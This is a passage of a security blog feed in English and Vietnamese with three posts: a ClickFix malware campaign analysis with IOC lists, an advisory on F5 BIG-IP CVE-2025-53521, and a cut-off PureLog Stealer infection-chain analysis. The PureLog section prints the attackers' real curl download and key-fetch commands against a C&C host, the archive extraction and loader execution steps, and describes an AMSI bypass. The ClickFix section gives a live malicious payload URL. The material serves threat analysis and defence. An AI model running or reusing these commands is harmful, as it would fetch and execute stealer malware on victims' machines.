<p>In this section, the attacker also runs a PowerShell command written in an "obfuscated" form to conceal the true behavior. This is a common technique in cyberattacks or malware to load and execute scripts remotely.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/e40fb76b-15c2-4677-a57c-51173090ed78.png" alt="" style="display:block;margin:0 auto" />

<p>Its main purpose is to download malware remotely from the address <a href="https://alababababa.cloud/cVGvQio6.txt">https://alababababa.cloud/cVGvQio6.txt</a> and then directly execute the downloaded content on the victim's computer.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/59338982-6514-4339-adbd-c70feb800e28.png" alt="" style="display:block;margin:0 auto" />

<h3>Cluster 4 &amp; 5 – macOS (Exploiting Mac Users)</h3>
<p>These clusters focus on macOS users—who are typically less targeted and therefore more likely to let their guard down.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/7836ce4a-4a23-4bd4-9633-068760eb7a1e.png" alt="" style="display:block;margin:0 auto" />

<p>Users are instructed to run the curl command in Terminal: "curl -kfsSL ". The -k parameter is used to bypass TLS certificate checks (potentially a fake server), while the -fsSL parameters download content "silently," without displaying errors.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6777abffdb647396c7d71de4/b2bcf2ba-5c73-4b42-a93e-37f6dc88a831.png" alt="" style="display:block;margin:0 auto" />

<p>The payload will be concealed using hex encoding and base64 encoding, then immediately decoded and executed directly on the machine. After running, the script will download and execute MacSync Stealer. This malware is tasked with stealing browser information, cookies, credentials, and crypto wallet data.</p>
<p>A notable aspect of this infection chain is its ability to attack directly through the Terminal (a trusted interface), cleverly exploiting the perception that "Mac is safer than Windows."</p>
<h2>Conclusion</h2>
<p>The ClickFix campaign demonstrates an effective combination of social engineering and cross-platform malware distribution, targeting both Windows and macOS through fake brands like QuickBooks, Booking, or Apple. By tricking users into executing malicious commands themselves, attackers can bypass traditional security mechanisms, deploying malware such as NetSupport RAT and Odyssey Stealer to gain control and steal data.</p>
<h2>Recommendation</h2>
<p><strong>Recognize and Avoid ClickFix Scams</strong></p>
<ul>
<li><p>Do not follow the instructions given:</p>
<ul>
<li><p>Open Run (Win + R), Terminal, or Command Prompt</p>
</li>
<li><p>Paste the command provided from the website/email</p>
</li>
</ul>
</li>
<li><p>Beware of fake brand websites such as:</p>
<ul>
<li>QuickBooks, Booking, Apple, cryptocurrency sites</li>
</ul>
</li>
<li><p>If you see a message like:</p>
<ul>
<li><p>"Fix system error"</p>
</li>
<li><p>"Verify account"</p>
</li>
<li><p>"Install required update"</p>
</li>
</ul>
</li>
</ul>
<p><strong>Do not download or run files from unknown sources.</strong></p>
<ul>
<li><p>Do not download:</p>
<ul>
<li>File .exe, .dmg, .pkg, .zip from unfamiliar websites</li>
</ul>
</li>
<li><p>Do not install the requested software:</p>
<ul>
<li><p>Turn off antivirus</p>
</li>
<li><p>Grant unusual admin permissions</p>
</li>
</ul>
</li>
<li><p>Only download from:</p>
<ul>
<li>Official websites or trusted App Stores</li>
</ul>
</li>
</ul>
<p><strong>Check the URL before logging in</strong></p>
<ul>
<li><p>Check the domain carefully:</p>
<ul>
<li><p>Avoid domains like:</p>
<ul>
<li><p><code>account-helpdesk[.]top</code></p>
</li>
<li><p><code>apple-diagnostic[.]wiki</code></p>
</li>
</ul>
</li>
</ul>
</li>
<li><p>Always:</p>
<ul>
<li><p>Type the URL manually instead of clicking links</p>
</li>
<li><p>Check for HTTPS and certificates</p>
</li>
</ul>
</li>
</ul>
<p><strong>Enable account protection</strong></p>
<ul>
<li><p>Enable Multi-Factor Authentication (MFA) for:</p>
<ul>
<li><p>Email</p>
</li>
<li><p>Financial accounts (QuickBooks, Booking)</p>
</li>
</ul>
</li>
<li><p>Use:</p>
<ul>
<li><p>Strong passwords, do not reuse</p>
</li>
<li><p>Password manager if possible</p>
</li>
</ul>
</li>
</ul>
<p><strong>Update system and software</strong></p>
<ul>
<li><p>Always update:</p>
<ul>
<li><p>Windows / macOS</p>
</li>
<li><p>Browsers (Chrome, Edge, Safari)</p>
</li>
</ul>
</li>
</ul>
<p><strong>Be cautious with email/phishing</strong></p>
<ul>
<li><p>Do not click on:</p>
<ul>
<li><p>Links from unfamiliar emails</p>
</li>
<li><p>Attachments from unknown sources</p>
</li>
</ul>
</li>
<li><p>Check:</p>
<ul>
<li><p>Sender (spoofed domain)</p>
</li>
<li><p>Pressure content (urgent, scare tactics)</p>
</li>
</ul>
</li>
</ul>
<h2><strong>MITRE ATT&amp;CK Mapping</strong></h2>
<table>
<thead>
<tr>
<th>Stage ClickFix</th>
<th>MITRE ATT&amp;CK Techniques</th>
</tr>
</thead>
<tbody><tr>
<td>Lure</td>
<td>T1566 (Phishing)</td>
</tr>
<tr>
<td>User Execution</td>
<td>T1204, T1059</td>
</tr>
<tr>
<td>Obfuscation &amp; LotL</td>
<td>T1027, T1218</td>
</tr>
<tr>
<td>Payload Delivery</td>
<td>T1105, T1071</td>
</tr>
<tr>
<td>In-Memory Execution</td>
<td>T1620, T1055</td>
</tr>
<tr>
<td>Data Theft</td>
<td>T1555, T1005</td>
</tr>
<tr>
<td>Exfiltration</td>
<td>T1041</td>
</tr>
</tbody></table>
<h2>IOCs</h2>
<h3>Intuit QuickBooks ClickFix</h3>
<p><strong>Domain</strong></p>
<p>4freepics[.]com anthonydee[.]com ariciversonille[.]com bancatangcode[.]com billiardinstitute[.]com cskhga6789[.]com customblindinstall[.]com deinhealthcoach[.]com elive123go[.]com elive777a[.]com extracareliving[.]com fomomforhealth[.]com grandmastertraders[.]traderslinkfx[.]com guypinions[.]com hostmaster[.]extracareliving[.]com mrinmay[.]net ned[.]coveney-ltd[.]com nhacaired88[.]com orkneygateway[.]com quiptly[.]com shopifyservercloud[.]com subsgoal[.]com suedfactoring[.]lit[.]com surecomforts[.]com theinvestworthy[.]com traderslinkfx[.]com ustazazharidrus[.]com visitbundala[.]com yvngvualr[.]com</p>
<p><strong>IP Addresses</strong></p>
<p>45[.]193[.]20[.]50 45[.]193[.]20[.]141 87[.]236[.]16[.]20 94[.]156[.]112[.]115 193[.]35[.]17[.]12 193[.]58[.]122[.]97 193[.]222[.]99[.]212</p>
<p><strong>Staging Domains</strong></p>
<p>nobovcs[.]com quicrob[.]com robovcs[.]com</p>
<p><strong>NetSupport RAT C2</strong></p>
<p>62[.]164[.]177[.]230</p>
<p><strong>File Hashes (NetSupport RAT)</strong></p>
<p>25865914ff0ec9421a5fa7dff2f680498f8893374f24d0b67a735bd8369299e9 280c7fb3033c6c34df88b61a4c90eb03e1ae7d1dc00355ca280a83903b776473 3f8202dacab7371e760e83b7d2b8fbd5d767f5bd408ed713ab0550c83ae82933 52f2813b9a7449946bdb98c171320d1801aa37a65903416c1aa186e44c66d745 56ebaf8922749b9a9a7fa2575f691c53a6170662a8f747faeed11291d475c422</p>
<h3><strong>Booking.com ClickFix</strong></h3>
<p><strong>Domains</strong></p>
<p>acconthelpdesk[.]com account-help[.]info account-helpdesk[.]icu account-helpdesk[.]info account-helpdesk[.]top accountmime[.]com accountpulse[.]help admin-activitycheck[.]com checkaccountactivity[.]com checkhelpdesk[.]com helpdeskpulse[.]com pulse-help-desk[.]com sign-in-op-token[.]com thepulseactivity[.]com thestayreserve[.]com</p>
<p><strong>IP Address</strong></p>
<p>91[.]1202[.]233[.]206</p>
<p><strong>Staging Domains</strong></p>
<p>bkng-updt[.]com checkpulses[.]com</p>
<p><strong>Staging IPs</strong></p>
<p>77[.]191[.]65[.]131 77[.]191[.]65[.]144</p>
<p><strong>NetSupport RAT C2 Domains</strong></p>
<p>hotelupdatesys[.]com chrm-srv[.]com ms-scedg[.]com</p>
<p><strong>NetSupport RAT C2 IP</strong></p>
<p>152[.]89[.]244[.]70</p>
<p><strong>File Hashes</strong></p>
<p>397dcea810f733494dbe307c91286d08f87f64aebbee787706fe6561ed3e20f8 5d821db386c7c879caeabf3e9f94c94a48eec6ec5a3a0efbae9d69da3f52c1db 43907e54cf3d1258f695d1112759b5457576481072cc76a679b8477cfeb3db87 b17c3e4058aacdcc36b18858d128d6b3058e0ea607a4dc59eb95b18b7c6acc7c</p>
<h3><strong>Dual-Platform ClickFix (Windows + macOS)</strong></h3>
<p><strong>Domains</strong></p>
<p>appmacintosh[.]com appmacosx[.]com apposx[.]com appsmacosx[.]com appxmacos[.]com cryptoinfnews[.]com cryptoinfo-allnews[.]com cryptoinfo-news[.]com cryptonews-info[.]com financementure[.]com macapp-apple[.]com macapps-apple[.]com macosapp-apple[.]com macosx-app[.]com macosx-apps[.]com macosxapp[.]com macosxappstore[.]com macxapp[.]com macxapp[.]org valetfortesla[.]com</p>
<p><strong>IP Address</strong></p>
<p>45[.]144[.]233[.]192</p>
<p><strong>Staging IPs (Odyssey Stealer C2)</strong></p>
<p>45[.]135[.]232[.]33 217[.]119[.]139[.]117</p>
<p><strong>Hash (Odyssey Stealer)</strong></p>
<p>2e9356948f2214fbf12ab3e873e0057fb64764cb8ed9d1c82e7ab0b3eef92a37</p>
<h3>Birdeye ClickFix</h3>
<p><strong>Domains</strong></p>
<p>acebirdrep[.]com bebirdrank[.]com birdrankbox[.]com birdrankfx[.]com birdrankgo[.]com birdrankinc[.]com birdrankllc[.]com birdrankmax[.]com birdranktip[.]com birdrankup[.]com birdrankus[.]com birdrankusa[.]com birdrankvip[.]com birdrankzen[.]com birdrepbiz[.]com birdrepgo[.]com birdrephelp[.]com birdreplab[.]com birdrepsys[.]com birdrepusa[.]com birdrepuse[.]com bitbirdrank[.]com bitbirdrep[.]com fixbirdrank[.]com getbirdrank[.]com gobirdrank[.]com helpbirdrank[.]com helpbirdrep[.]com infobirdrep[.]com justbirdrank[.]com mybirdrank[.]com nowbirdrank[.]com optbirdrank[.]com probirdrep[.]com topbirdrank[.]com topbirdrep[.]com usbirdrank[.]com usebirdrep[.]com vipbirdrank[.]com</p>
<h3><strong>macOS Storage Cleaning ClickFix</strong></h3>
<p><strong>Domains</strong></p>
<p>apple[.]assistance-tools[.]com apple[.]diagnostic[.]wiki mac-os-helper[.]com macintosh-hub[.]com macos-storageperf[.]com stormac[.]lit[.]com</p>
<h2>Refer to</h2>
<p><a href="https://cybersecuritynews.com/new-clickfix-attack-leverage-windows-run-dialog-box/#google_vignette">New ClickFix Attack Leverage Windows Run Dialog Box and macOS Terminal to Deploy Malware</a></p>
<p><a href="https://www.recordedfuture.com/research/clickfix-campaigns-targeting-windows-and-macos">ClickFix Campaigns Targeting Windows and macOS</a></p>
]]></content:encoded></item><item><title><![CDATA[Hơn 14.000 thiết bị F5 BIG-IP APM có nguy cơ bị tấn công thực thi mã từ xa]]></title><description><![CDATA[Vừa qua, cơ quan An ninh Cơ sở hạ tầng và An ninh mạng Hoa Kỳ (CISA) đã bổ sung một lỗ hổng CVE mới, tồn tại trong sản phẩm F5 BIG-IP vào danh mục Các Lỗ hổng Đang bị Khai thác (KEV) của mình với cảnh]]></description><link>https://blog.fiscybersec.com/h-n-14-000-thi-t-b-f5-big-ip-apm-c-nguy-c-b-t-n-c-ng-th-c-thi-m-t-xa</link><guid isPermaLink="true">https://blog.fiscybersec.com/h-n-14-000-thi-t-b-f5-big-ip-apm-c-nguy-c-b-t-n-c-ng-th-c-thi-m-t-xa</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[f5-big-ip]]></category><category><![CDATA[vulnerability]]></category><dc:creator><![CDATA[Mai Đức Nam Anh]]></dc:creator><pubDate>Fri, 03 Apr 2026 03:30:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/669e7a2f2c109ecd663148bd/0a6a9f90-29d6-483f-9b69-989a6f7398ae.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Vừa qua, cơ quan An ninh Cơ sở hạ tầng và An ninh mạng Hoa Kỳ (CISA) đã bổ sung một lỗ hổng CVE mới, tồn tại trong sản phẩm F5 BIG-IP vào danh mục Các Lỗ hổng Đang bị Khai thác (KEV) của mình với cảnh báo rằng lỗ hổng này đang bị khai thác tích cực trên thực tế.</p>
<h3>Thông tin chi tiết</h3>
<ul>
<li><p><em>Định danh lỗ hổng:</em> <a href="https://nvd.nist.gov/vuln/detail/CVE-2025-53521"><code>CVE-2025-53521</code></a></p>
</li>
<li><p><em>Điểm CVSS (4.0):</em> <strong>9.3</strong></p>
</li>
<li><p><em>Mức độ nghiêm trọng:</em> <strong>CRITICAL</strong> - Cực kỳ nghiêm trọng</p>
</li>
<li><p><em>Mô tả:</em> Lỗi được xác định trong F5 BIG-IP Access Policy Manager (APM), xảy ra khi một chính sách truy cập được thiết lập trên máy chủ ảo (virtual server) có thể cho phép các lưu lượng truy cập độc hại kết nối, từ đó dẫn đến cho phép thực thi mã từ xa (RCE).</p>
</li>
<li><p><em>Phiên bản bị ảnh hưởng:</em></p>
</li>
</ul>
<table>
<thead>
<tr>
<th>Tên sản phẩm</th>
<th>Nhánh</th>
<th>Phiên bản bị ảnh hưởng</th>
</tr>
</thead>
<tbody><tr>
<td>BIG-IP APM</td>
<td>17.x</td>
<td><code>17.5.0</code> - <code>17.5.1</code></td>
</tr>
<tr>
<td>16.x</td>
<td><code>16.1.0</code> - <code>16.1.6</code></td>
<td></td>
</tr>
<tr>
<td>15.x</td>
<td><code>15.1.0</code> - <code>15.1.10</code></td>
<td></td>
</tr>
</tbody></table>
<p><strong>F5 BIG-IP</strong> là giải pháp Bộ điều khiển phân phối ứng dụng (Application Delivery Controller - ADC) hàng đầu thế giới. Trong hạ tầng công nghệ thông tin, F5 BIG-IP đóng vai trò là "điểm tiếp nhận tập trung" (Gateway) đứng trước các máy chủ dịch vụ, chịu trách nhiệm quản lý, tối ưu hóa và bảo mật toàn bộ lưu lượng truy cập từ người dùng đến ứng dụng.</p>
<p>F5 BIG-IP được sử dụng rộng rãi trong các tổ chức, doanh nghiệp nhờ các ưu điểm cốt lõi:</p>
<ul>
<li><p>Cân bằng tải (Load Balancing): Đảm bảo tính sẵn sàng cao bằng cách phân phối thông minh yêu cầu của người dùng đến các máy chủ đang hoạt động ổn định, loại bỏ tình trạng quá tải cục bộ.</p>
</li>
<li><p>Bảo mật ứng dụng (Security): Tích hợp các lớp phòng thủ chuyên sâu (WAF, Firewall, Access Control) để ngăn chặn các hình thức tấn công khai thác lỗ hổng và truy cập trái phép.</p>
</li>
<li><p>Tối ưu hóa hiệu suất: Tăng tốc độ phản hồi của ứng dụng thông qua các kỹ thuật nén dữ liệu và điều phối luồng thông tin hiệu quả.</p>
</li>
</ul>
<p>Do những ưu điểm cốt lõi trên mà F5 BIG-IP thường được đứng tại những vị trí nhạy cảm trong các tổ chức và doanh nghiệp, đóng vai trò là lớp phòng thủ đầu tiên cũng như là chốt chặn cuối cùng trước khi dữ liệu đi vào vùng lõi (backend), khiến nó trở thành mục tiêu giá trị đối với bất kỳ kẻ tấn công nào. Do đó, việc đảm bảo an toàn bảo mật luôn được đặt lên hàng đầu.</p>
<p>Mới đây, Cơ quan An ninh Cơ sở hạ tầng và An ninh mạng Hoa Kỳ (CISA) đã bổ sung thêm một lỗ hổng trong sản phẩm F5 BIG-IP vào danh mục Các Lỗ hổng Đang bị Khai thác (KEV) của mình, cảnh báo rằng lỗ hổng này đang bị khai thác tích cực trên thực tế.</p>
<img src="https://cdn.hashnode.com/uploads/covers/669e7a2f2c109ecd663148bd/7b1c60c9-6f59-4b21-8b3e-a221587b0bb0.png" alt="" style="display:block;margin:0 auto" />

<p>Lỗ hổng được xác định là <strong>CVE-2025-53521</strong>, tồn tại trong giải pháp BIG-IP APM (Access Policy Manager) - một proxy quản lý truy cập tập trung của F5. Giải pháp này được thiết kế nhằm hỗ trợ quản trị viên bảo mật quyền truy cập vào mạng nội bộ, nền tảng đám mây, các ứng dụng và API của tổ chức.</p>
<p>CVE-2025-53521 cho phép kẻ tấn công không có bất kỳ đặc quyền nào hay chưa từng có tài khoản nào trên hệ thống, có thể lợi dụng, khai thác trực tiếp lỗ hổng nhằm đạt được quyền thực thi mã từ xa trên các instance BIG-IP APM chưa được vá lỗi, đặc biệt là các hệ thống có cấu hình chính sách truy cập trên các máy chủ ảo.</p>
<p>Mặc dù lỗ hổng này đã xuất hiện từ cách đây 5 tháng, tuy nhiên Shadowserver - một tổ chức phi lợi nhuận quốc tế chuyên thu thập, giám sát, phân tích và cảnh báo các mối đe doạ trên không gian mạng cho biết, hiện vẫn có hơn 17.000 địa chỉ IP có dấu hiệu sử dụng BIG-IP APM, trong đó khoảng 14.000 instance F5 BIG-IP APM đang nằm trong tình trạng nguy hiểm, nguy cơ cao trở thành mục tiêu tiếp theo bị nhắm tới trong bối cảnh phía F5 đã ghi nhận nhiều cuộc tấn công khai thác lỗ hổng này trên thực tế.</p>
<img src="https://cdn.hashnode.com/uploads/covers/669e7a2f2c109ecd663148bd/8c46efae-fc8e-4fea-9f04-d7574d9320b9.png" alt="" style="display:block;margin:0 auto" />

<h3>Khuyến nghị &amp; Khắc phục</h3>
<p>Các chuyên gia an ninh mạng thuộc F5 đã công bố những dấu hiệu nhận biết xâm nhập (IOCs) rộng rãi trên không gian mạng, người dùng và quản trị viên cần:</p>
<ul>
<li><p><strong>Cập nhật bản vá:</strong> Cập nhật lên phiên bản mới nhất của BIG-IP APM nhằm khắc phục toàn diện nguy cơ. Danh sách các phiên bản được vá bao gồm: 17.5.1.3 17.1.3 16.1.6.1 15.1.10.8</p>
</li>
<li><p><strong>Kiểm tra hệ thống:</strong> Rà soát ổ đĩa, nhật ký hệ thống (logs) và lịch sử thao tác terminal trên các thiết bị BIG-IP để tìm kiếm dấu hiệu hoạt động trái phép. Thiết lập kiểm soát truy cập nghiêm ngặt, triển khai nguyên tắc đặc quyền tối thiểu (least privilege) cho tất cả người dùng và dịch vụ truy cập vào F5 BIG-IP.</p>
</li>
<li><p><strong>Xây dựng kế hoạch xử lý sự cố:</strong> Xây dựng kế hoạch, phương án xử lý nếu phát sinh sự cố. Khi phát hiện có dấu hiệu bị xâm nhập, biện pháp an toàn nhất là xây dựng lại hệ thống từ đầu, do đó cần có kế hoạch đầy đủ để đưa trạng thái hệ thống về mức bình thường một cách nhanh nhất.</p>
</li>
<li><p><strong>Cô lập &amp; Sao lưu dữ liệu:</strong> F5 nhấn mạnh rằng các bản sao lưu cấu hình (UCS) được tạo sau thời điểm bị tấn công có thể chứa mã độc lâu dài. Do đó, quản trị viên và người dùng chỉ nên khôi phục cấu hình từ các bản sao lưu được xác minh an toàn. Ngoài ra, người dùng và quản trị viên cũng cần cô lập các hệ thống BIG-IP khỏi các phần còn lại của mạng để hạn chế khả năng di chuyển ngang nếu hệ thống bị xâm nhập.</p>
</li>
</ul>
<h3>Danh sách IOC</h3>
<p>Quản trị viên và người dùng có thể truy cập danh sách IOC do F5 cung cấp thông qua đường dẫn sau:</p>
<ul>
<li><a href="https://my.f5.com/manage/s/article/K000160486">https://my.f5.com/manage/s/article/K000160486</a></li>
</ul>
<h3>Tham khảo</h3>
<ol>
<li><p><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-53521">CVE-2025-53521</a></p>
</li>
<li><p><a href="https://my.f5.com/manage/s/article/K000156741">F5 Security Advisory</a></p>
</li>
<li><p><a href="https://www.bleepingcomputer.com/news/security/over-14-000-f5-big-ip-apm-instances-still-exposed-to-rce-attacks/">Over 14,000 F5 BIG-IP APM instances still exposed to RCE attacks</a></p>
</li>
</ol>
]]></content:encoded></item><item><title><![CDATA[Chiến dịch PureLog Stealer -  Chuỗi Tấn Công Nhiều Giai Đoạn Nhắm Vào Các Ngành Trọng Yếu]]></title><description><![CDATA[Một file giả mạo thông báo vi phạm bản quyền đang được dùng để phát tán PureLog Stealer — một infostealer thương mại chi phí thấp nhưng được triển khai qua chuỗi tấn công đa tầng đáng lo ngại. Thay vì]]></description><link>https://blog.fiscybersec.com/chi-n-d-ch-purelog-stealer-chu-i-t-n-c-ng-nhi-u-giai-o-n-nh-m-v-o-c-c-ng-nh-tr-ng-y-u</link><guid isPermaLink="true">https://blog.fiscybersec.com/chi-n-d-ch-purelog-stealer-chu-i-t-n-c-ng-nhi-u-giai-o-n-nh-m-v-o-c-c-ng-nh-tr-ng-y-u</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[PureLog Stealer]]></category><dc:creator><![CDATA[Nguyễn Văn Trung]]></dc:creator><pubDate>Wed, 01 Apr 2026 08:54:32 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/669e2c7992d73f3fd8335153/5f932e77-4afc-4e6b-8f3d-ed801abb36fa.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Một file giả mạo thông báo vi phạm bản quyền đang được dùng để phát tán PureLog Stealer — một infostealer thương mại chi phí thấp nhưng được triển khai qua chuỗi tấn công đa tầng đáng lo ngại. Thay vì phân phối đại trà, chiến dịch này thể hiện rõ dấu hiệu của selective targeting: lure được bản địa hóa theo ngôn ngữ nạn nhân, payload mã hóa được tải từ C&amp;C, và khóa giải mã được lấy động từ server riêng biệt.</p>
<p><strong>Đối tượng bị ảnh hưởng:</strong> Tổ chức trong ngành y tế, chính phủ, khách sạn và giáo dục tại Đức, Canada, Mỹ và Úc. Chiến dịch cũng lạm dụng Google Ads malvertising song song với phishing email để phân phối payload.</p>
<p><strong>Rủi ro cốt lõi:</strong> PureLog Stealer thu thập credential Chrome, extension trình duyệt, ví crypto và thông tin hệ thống — toàn bộ thực thi trong memory, không ghi file lên disk, khiến nhiều giải pháp AV truyền thống bỏ sót.</p>
<p><strong>Hành động ưu tiên ngay:</strong> Block các domain C&amp;C đã xác định, bật behavioral detection trên endpoint, và hunt proactively với query <code>detectionName:*PURELOGSSTEALER*</code> trong SIEM/EDR.</p>
<hr />
<h2>Tổng quan chiến dịch</h2>
<p>PureLog Stealer vốn được biết đến là infostealer "entry-level" — giá rẻ, dễ dùng, thường được các threat actor ít kinh nghiệm khai thác. Điều làm chiến dịch này khác biệt không phải là bản thân payload, mà là delivery chain được thiết kế kỹ lưỡng bất thường cho một công cụ "low-cost".</p>
<p>Kỹ thuật này không phải ngẫu nhiên — nó tăng đáng kể tỷ lệ người dùng thực thi file vì lure trông "đúng ngữ cảnh" với môi trường làm việc của họ.</p>
<h3>Điểm kỹ thuật nổi bật</h3>
<ul>
<li><p>DLL sideloading khởi tạo execution</p>
</li>
<li><p>Payload mã hóa giả dạng file PDF</p>
</li>
<li><p>Khóa giải mã được lấy từ endpoint riêng của C&amp;C (không hardcode trong malware)</p>
</li>
<li><p>WinRAR bị đổi tên thành file PNG dùng để giải nén</p>
</li>
<li><p>Python loader giải mã và thực thi PureLog Stealer hoàn toàn trong memory</p>
</li>
</ul>
<hr />
<h2>Chuỗi lây nhiễm chi tiết</h2>
<img src="https://www.trendmicro.com/content/dam/trendmicro/global/en/research/26/c/purelog-stealer/fig1.png" alt="Hình 1. Chuỗi lây nhiễm đầy đủ của chiến dịch" style="display:block;margin:0 auto" />

<p><em>Hình 1. Chuỗi lây nhiễm đầy đủ của chiến dịch</em></p>
<h3>Stage 1 — Người dùng thực thi lure file</h3>
<p>Chuỗi lây nhiễm khởi động khi nạn nhân chủ động chạy file giả mạo. Không có exploit, không có zero-day — toàn bộ phụ thuộc vào social engineering. Executable sau đó gọi command interpreter:</p>
<pre><code class="language-cmd">cmd.exe /c ...
</code></pre>
<h3>Stage 2 — Decoy document</h3>
<p>Ngay lập tức, malware mở một file PDF "bình thường" để đánh lạc hướng người dùng:</p>
<pre><code class="language-cmd">start "" ".\_\document.pdf"
</code></pre>
<p>Kỹ thuật này tạo cảm giác hành động của người dùng là hợp lệ — họ thấy một tài liệu hiện ra đúng như kỳ vọng khi click vào "thông báo vi phạm bản quyền".</p>
<h3>Stage 3 — Tải payload mã hóa</h3>
<p>Malware tải payload từ C&amp;C với một số kỹ thuật đáng chú ý:</p>
<pre><code class="language-cmd">curl -A "curl/meow_meow" -s -k -L "https://quickdocshare.com/DQ" -o ".\_\invoice.pdf"
</code></pre>
<ul>
<li><p><strong>Custom User-Agent</strong> <code>curl/meow_meow</code>: không khớp với bất kỳ browser/tool hợp lệ nào — indicator đơn giản nhưng hữu ích cho network detection</p>
</li>
<li><p><code>-k</code> (ignore TLS validation): cho phép dùng self-signed cert ở C&amp;C</p>
</li>
<li><p><code>-L</code> (follow redirect): linh hoạt thay đổi hosting location</p>
</li>
<li><p>File lưu dưới tên <code>invoice.pdf</code> nhưng thực chất là encrypted archive</p>
</li>
</ul>
<h3>Stage 4 — Lấy khóa giải mã từ xa</h3>
<p>Đây là điểm thiết kế thông minh nhất của chiến dịch. Thay vì embed password trong malware:</p>
<pre><code class="language-cmd">curl -A "curl/meow_meow" -s -k -L "https://quickdocshare.com/DQ/key"
</code></pre>
<p>Response được capture vào biến <code>%i</code> trong command line. Thiết kế này có ba hệ quả:</p>
<ol>
<li><p><strong>Không có static password</strong> → analyst không thể giải mã payload khi offline</p>
</li>
<li><p><strong>Operator có thể rotate password per-victim</strong> → mỗi ca nhiễm có thể được kiểm soát độc lập</p>
</li>
<li><p><strong>Có thể vô hiệu hóa payload bất kỳ lúc nào</strong> bằng cách xóa key endpoint</p>
</li>
</ol>
<h3>Stage 5 — Giải nén bằng WinRAR đổi tên</h3>
<pre><code class="language-cmd">".\_\FILE_2025년_재직증명서_원본.png" x -p"%i" ".\_\invoice.pdf" "C:\Users\Public\" -y
</code></pre>
<p>File <code>.png</code> trên thực chất là WinRAR executable bị đổi tên, giải nén payload với password lấy động từ Stage 4. Extension <code>.png</code> không ảnh hưởng đến khả năng thực thi — Windows thực thi dựa trên PE header, không phải extension.</p>
<h3>Stage 6 — Xóa dấu vết</h3>
<pre><code class="language-cmd">del ".\_\invoice.pdf"
</code></pre>
<p>Xóa file archive mã hóa sau khi giải nén xong, giảm forensic artifacts trên disk.</p>
<h3>Stage 7 — Chuyển working directory</h3>
<pre><code class="language-cmd">cd "C:\Users\Public\Windows"
</code></pre>
<p>Thư mục <code>C:\Users\Public\Windows</code> không tồn tại mặc định trên Windows — đây là directory malware tự tạo. Tên gợi nhớ đến <code>C:\Windows</code> hợp lệ nhưng nằm dưới <code>Public</code>, không yêu cầu quyền admin để ghi.</p>
<h3>Stage 8 — Thực thi second-stage loader</h3>
<pre><code class="language-cmd">"C:\Users\Public\Windows\svchost.exe" "instructions.pdf"
</code></pre>
<p>Hai điểm cần lưu ý:</p>
<ul>
<li><p><code>svchost.exe</code> ở đây <strong>không phải</strong> Windows service host hợp lệ — đây là <code>python.exe</code> bị đổi tên</p>
</li>
<li><p><code>instructions.pdf</code> là Python script bị obfuscate, đóng vai trò loader cho hai .NET executable tiếp theo</p>
</li>
</ul>
<hr />
<h2>Phân tích biến thể</h2>
<p>Trend Micro xác định hai infection chain song song, chia sẻ cùng toolset nhưng có sự khác biệt rõ về operational security:</p>
<table>
<thead>
<tr>
<th>Điểm khác biệt</th>
<th>Chain 2 (hoạt động trước)</th>
<th>Chain 1 (hoạt động gần đây hơn)</th>
</tr>
</thead>
<tbody><tr>
<td>Phân phối payload</td>
<td>Tải trực tiếp từ C&amp;C <code>quickdocshare[.]com/DQ</code></td>
<td>Đóng gói sẵn trong dropper</td>
</tr>
<tr>
<td>Khóa giải mã</td>
<td>Lấy động từ C&amp;C <code>/DQ/key</code> — không lưu trên disk</td>
<td>Hardcode trong command line: <code>efvBE97W7Ke4RnZaDTXOJzgqa04EPfz9</code></td>
</tr>
<tr>
<td>Thực thi cuối</td>
<td><code>svchost.exe "instructions.pdf"</code> — logic trong binary</td>
<td><code>svchost.exe -c "exec(base64...)"</code> — Python routine inline trong command</td>
</tr>
<tr>
<td>Phụ thuộc C&amp;C</td>
<td>Cần C&amp;C online — liên lạc 2 endpoint</td>
<td>Hoàn toàn offline sau khi dropper chạy</td>
</tr>
</tbody></table>
<p>Chain 2 phức tạp hơn về operational security (không để key trên disk, cần C&amp;C active). Chain 1 đơn giản hơn nhưng key hardcode — dễ bị extract hơn. Sự tồn tại của hai chain cho thấy operator đang iterate và test các approach khác nhau.</p>
<hr />
<h2>Phân tích instructions.pdf</h2>
<p>Bất chấp extension <code>.pdf</code>, file này là Python script bị obfuscate nặng — mọi string đều Base64-encode, mọi hằng số đều ẩn sau biểu thức toán học nhiều hạng tử. Khi stripped toàn bộ noise, script triển khai 8 capability theo thứ tự thực thi xác định.</p>
<img src="https://www.trendmicro.com/content/dam/trendmicro/global/en/research/26/c/purelog-stealer/fig11.png" alt="Hình 11. Các capability của instructions.pdf" style="display:block;margin:0 auto" />

<p><em>Hình 11. Các capability của instructions.pdf</em></p>
<h3>Capability 1: AMSI Bypass</h3>
<p>Script vô hiệu hóa Windows Defender AMSI (Antimalware Scan Interface) trước khi load payload, thực hiện qua hai stage:</p>
<ul>
<li><p><strong>Stage 1:</strong> Patch entry point của <code>AmsiScanBuffer</code> với <code>MOV EAX, E_INVALIDARG + JMP</code> — function này sẽ luôn trả về "not malicious"</p>
</li>
<li><p><strong>Stage 2:</strong> Scan forward từ entry point để tìm mọi conditional jump (JZ/JNZ) và thay bằng unconditional JMP — bypass vẫn hoạt động ngay cả khi Stage 1 bị partial detection</p>
</li>
</ul>
<img src="https://www.trendmicro.com/content/dam/trendmicro/global/en/research/26/c/purelog-stealer/fig12.png" alt="Hình 12. Python code patch AMSI trong memory để bypass antivirus scanning" style="display:block;margin:0 auto" />

<p><em>Hình 12. Python code patch AMSI trong memory để bypass antivirus scanning</em></p>
<h3>Capability 2: Reflective .NET Assembly Load qua COM/CLR</h3>
<p>Sau khi vô hiệu AMSI, script load một .NET assembly mã hóa hoàn toàn trong memory. Quy trình:</p>
<ol>
<li><p>Bootstrap .NET CLR bằng raw COM vtable calls</p>
</li>
<li><p>Construct SAFEARRAY chứa decrypted assembly bytes</p>
</li>
